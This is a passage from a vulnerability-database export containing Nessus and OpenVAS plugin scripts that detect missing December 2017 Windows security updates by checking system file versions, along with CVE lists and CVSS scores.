An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n \n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4047170/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b4fb53fa\");\n # https://support.microsoft.com/en-us/help/4052303/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6218937f\");\n # https://support.microsoft.com/en-us/help/4053473/security-update-for-the-information-disclosure-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fae1fdfc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n - 4047170\n - 4052303\n - 4053473\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-12';\n\nkbs = make_list(\n \"4047170\",\n \"4052303\",\n \"4053473\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! 
smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4052303\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"rasserver_31bf3856ad364e35\", file_pat:\"^iprtprio\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24231'),\n max_versions:make_list('6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4052303\", session:the_session);\n\n# 4053473\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"htmlhelp-infotech_31bf3856ad364e35\", file_pat:\"^itircl\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24233'),\n max_versions:make_list('6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4053473\", session:the_session);\n\n# 4047170\nif(hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wmp.dll\", version:\"11.0.6002.24234\", min_version:\"11.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4047170\"))\n vuln++;\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-08T23:35:34", "description": "This host is missing a critical security\n update according to Microsoft KB4053580", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4053580)", 
"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11893", "CVE-2017-11888", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11905", "CVE-2017-11918", "CVE-2017-11899", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11914", "CVE-2017-11911", "CVE-2017-11910", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11909", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812333", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812333", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4053580)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812333\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11907\", \"CVE-2017-11909\", \"CVE-2017-11910\", \"CVE-2017-11911\",\n \"CVE-2017-11912\", \"CVE-2017-11885\", \"CVE-2017-11886\", \"CVE-2017-11887\",\n \"CVE-2017-11888\", \"CVE-2017-11889\", \"CVE-2017-11890\", \"CVE-2017-11893\",\n \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11899\", \"CVE-2017-11901\",\n \"CVE-2017-11903\", \"CVE-2017-11905\", \"CVE-2017-11906\", \"CVE-2017-11913\",\n \"CVE-2017-11914\", \"CVE-2017-11918\", \"CVE-2017-11919\", \"CVE-2017-11927\",\n \"CVE-2017-11930\");\n script_bugtraq_id(102045, 102085, 102086, 102087, 102092, 102055, 102062, 102063,\n 102065, 102080, 102082, 102081, 102053, 102054, 102077, 102046,\n 102047, 102050, 102078, 102091, 102088, 102089, 102093, 102095, 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 09:15:18 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4053580)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4053580\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access 
enabled.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error when Internet Explorer improperly handles objects in memory.\n\n - An error when the Windows its:// protocol handler unnecessarily sends traffic\n to a remote site in order to determine the zone of a provided URL.\n\n - An error when Microsoft Edge improperly accesses objects in memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - A security feature bypass exists when Device Guard incorrectly validates an\n untrusted file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, gain the same user rights as the current user, obtain\n sensitive information to further compromise the user's system, a brute-force\n to disclose the NTLM hash password and make an unsigned file appear to be signed.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4053580\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.785\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.785\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:30", "description": "This host is missing a critical security\n update according to Microsoft KB4053579", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4053579)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11893", "CVE-2017-11888", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11905", "CVE-2017-11918", "CVE-2017-11899", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11914", "CVE-2017-11911", 
"CVE-2017-11910", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11909", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310812332", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812332", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4053579)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812332\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-11885\", \"CVE-2017-11907\", \"CVE-2017-11909\", \"CVE-2017-11910\",\n \"CVE-2017-11911\", \"CVE-2017-11912\", \"CVE-2017-11886\", \"CVE-2017-11887\",\n \"CVE-2017-11888\", \"CVE-2017-11889\", \"CVE-2017-11890\", \"CVE-2017-11893\",\n \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11899\", \"CVE-2017-11901\",\n \"CVE-2017-11903\", \"CVE-2017-11905\", \"CVE-2017-11906\", \"CVE-2017-11913\",\n \"CVE-2017-11914\", \"CVE-2017-11918\", \"CVE-2017-11919\", \"CVE-2017-11927\",\n \"CVE-2017-11930\");\n 
script_bugtraq_id(102055, 102045, 102085, 102086, 102087, 102092, 102062, 102063,\n 102065, 102080, 102082, 102081, 102053, 102054, 102077, 102046,\n 102047, 102050, 102078, 102091, 102088, 102089, 102093, 102095,\n 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 09:08:24 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4053579)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4053579\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access enabled.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error when Internet Explorer improperly handles objects in memory.\n\n - An error when the Windows its:// protocol handler unnecessarily sends traffic\n to a remote site in order to determine the zone of a provided URL.\n\n - An error when Microsoft Edge improperly accesses objects in memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - A security feature bypass exists when Device Guard incorrectly validates an\n untrusted file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, gain the same user rights as the current user, obtain\n sensitive information to further compromise the user's system, a brute-force\n to disclose the NTLM hash password and make an unsigned file 
appear to be signed.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2016\n\n - Microsoft Windows 10 Version 1607 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4053579\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2016:1, win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1943\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.1943\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:33", "description": "This host is missing a critical security\n update according to Microsoft KB4053578", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4053578)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11893", "CVE-2017-11888", "CVE-2017-11903", "CVE-2017-11919", 
"CVE-2017-11913", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11905", "CVE-2017-11918", "CVE-2017-11899", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11914", "CVE-2017-11911", "CVE-2017-11910", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11909", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812331", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812331", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4053578)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812331\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11885\", \"CVE-2017-11907\", \"CVE-2017-11909\", \"CVE-2017-11910\",\n \"CVE-2017-11911\", \"CVE-2017-11912\", \"CVE-2017-11886\", \"CVE-2017-11887\",\n \"CVE-2017-11888\", \"CVE-2017-11889\", \"CVE-2017-11890\", \"CVE-2017-11893\",\n \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11899\", \"CVE-2017-11901\",\n \"CVE-2017-11903\", \"CVE-2017-11905\", \"CVE-2017-11906\", \"CVE-2017-11913\",\n \"CVE-2017-11914\", \"CVE-2017-11918\", \"CVE-2017-11919\", \"CVE-2017-11927\",\n \"CVE-2017-11930\");\n script_bugtraq_id(102055, 102045, 102085, 102086, 102087, 102092, 102062, 102063,\n 102065, 102080, 102082, 102081, 102053, 102054, 102077, 102046,\n 102047, 102050, 102078, 102091, 102088, 102089, 102093, 102095,\n 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 08:56:15 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4053578)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4053578\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access 
enabled.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error when Internet Explorer improperly handles objects in memory.\n\n - An error when the Windows its:// protocol handler unnecessarily sends traffic\n to a remote site in order to determine the zone of a provided URL.\n\n - An error when Microsoft Edge improperly accesses objects in memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - A security feature bypass exists when Device Guard incorrectly validates an\n untrusted file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, gain the same user rights as the current user, obtain\n sensitive information to further compromise the user's system, a brute-force\n to disclose the NTLM hash password and make an unsigned file appear to be signed.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4053578\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.1294\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10586.0 - 11.0.10586.1294\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "description": "This host is missing a critical security\n update according to Microsoft KB4054517", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4054517)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11893", "CVE-2017-11888", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11908", "CVE-2017-11905", "CVE-2017-11918", "CVE-2017-11899", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11914", 
"CVE-2017-11911", "CVE-2017-11910", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11909", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812335", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812335", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4054517)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812335\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11907\", \"CVE-2017-11908\", \"CVE-2017-11909\", \"CVE-2017-11910\",\n \"CVE-2017-11911\", \"CVE-2017-11912\", \"CVE-2017-11885\", \"CVE-2017-11886\",\n \"CVE-2017-11887\", \"CVE-2017-11888\", \"CVE-2017-11889\", \"CVE-2017-11890\",\n \"CVE-2017-11893\", \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11899\",\n \"CVE-2017-11901\", \"CVE-2017-11903\", \"CVE-2017-11905\", \"CVE-2017-11906\",\n \"CVE-2017-11913\", \"CVE-2017-11914\", \"CVE-2017-11918\", \"CVE-2017-11919\",\n \"CVE-2017-11927\", 
\"CVE-2017-11930\");\n script_bugtraq_id(102045, 102052, 102085, 102086, 102087, 102092, 102055, 102062,\n 102063, 102065, 102080, 102082, 102081, 102053, 102054, 102077,\n 102046, 102047, 102050, 102078, 102091, 102088, 102089, 102093,\n 102095, 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 10:19:32 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4054517)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4054517\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access enabled.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error when Internet Explorer improperly handles objects in memory.\n\n - An error when the Windows its:// protocol handler unnecessarily sends traffic\n to a remote site in order to determine the zone of a provided URL.\n\n - An error when Microsoft Edge improperly accesses objects in memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - A security feature bypass exists when Device Guard incorrectly validates an\n untrusted file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, gain the same user rights as the current user, obtain\n sensitive information to further compromise the user's system, a brute-force\n to disclose the NTLM hash password 
and make an unsigned file appear to be signed.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1709 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4054517\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.124\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.124\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:33", "description": "This host is missing a critical security\n update according to Microsoft KB4053581", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4053581)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11888", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11889", 
